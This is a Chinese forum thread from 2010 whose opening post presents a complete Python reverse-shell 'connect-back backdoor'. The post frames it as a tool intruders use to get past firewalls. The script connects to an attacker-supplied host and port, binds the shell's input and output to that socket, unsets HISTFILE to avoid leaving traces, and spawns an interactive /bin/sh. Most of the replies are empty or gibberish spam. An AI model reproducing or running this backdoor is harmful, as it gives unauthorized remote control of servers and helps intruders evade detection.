看黑客如何用python编写ttyshell的反向链接后门

admin · 发表于 2010-8-31 16:21:21

很多入侵者都会在正面遇到防火墙之后，采用反向链接的方法控制远程服务器。早期大家都用perl或c代码写。现在大家都与时俱进了，用python写了。代码量减少很多啊。
小雨写的一个，替代之前的perl版本的，可以直接返回ttyshell。返回的shell可以直接ssh，su等操作。
代码如下：

#!/usr/bin/python
import sys
import os
import socket
import pty
shell = "/bin/sh"
def usage(programname):
print "ython connect-back door"
print "Usage: %s
" % programname
def main():
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit(1)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
print "[+]Connect OK."
except:
print "[-]Can't connect"
sys.exit(2)
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
pty.spawn(shell)
s.close()
if __name__ == "__main__":
main()

xiawenfeng · 发表于 2011-6-24 17:22:46

zxb_12311 · 发表于 2011-11-20 00:14:27

kflyair · 发表于 2012-7-24 14:59:15

lxturbo · 发表于 2012-8-8 16:14:50

天国的MVP · 发表于 2013-1-3 14:03:05

shiji0718 · 发表于 2013-3-26 09:16:40

这个真的需要

greenfan · 发表于 2017-9-18 21:06:54

那不嫁你见你

greenfan · 发表于 2017-9-18 21:07:00

回购计划工具钢聚光镜

greenfan · 发表于 2017-9-18 21:07:07

就比较看好工行工行卡号给

greenfan · 发表于 2017-9-18 21:07:13

开荒开荒恐惧好空间好空间

greenfan · 发表于 2017-9-18 21:07:19

就看你家那里哪里

greenfan · 发表于 2017-9-18 21:07:24

环境更加更加辉煌国际化工

greenfan · 发表于 2017-9-18 21:07:29

感脚后跟脚后跟就

greenfan · 发表于 2017-9-18 21:07:34

就能看见了尽可能靠近就能看了

账号		自动登录	找回密码
密码			论坛注册

看黑客如何用python编写ttyshell的反向链接后门

客服中心

投诉建议